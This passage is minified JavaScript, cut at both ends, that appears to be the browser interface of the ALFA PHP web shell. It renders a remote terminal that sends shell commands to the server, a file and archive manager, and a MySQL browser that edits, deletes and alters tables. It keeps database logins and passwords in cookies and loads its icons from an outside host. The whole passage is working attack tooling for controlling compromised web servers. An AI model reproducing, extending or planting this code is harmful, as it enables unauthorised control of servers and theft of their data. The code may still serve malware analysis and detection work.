name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if($("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var a=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+a),t.setAttribute("opt_id",e+i)}else{a=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+a)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var a=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+a),t.setAttribute("opt_id",e)}else{a=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+a)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var 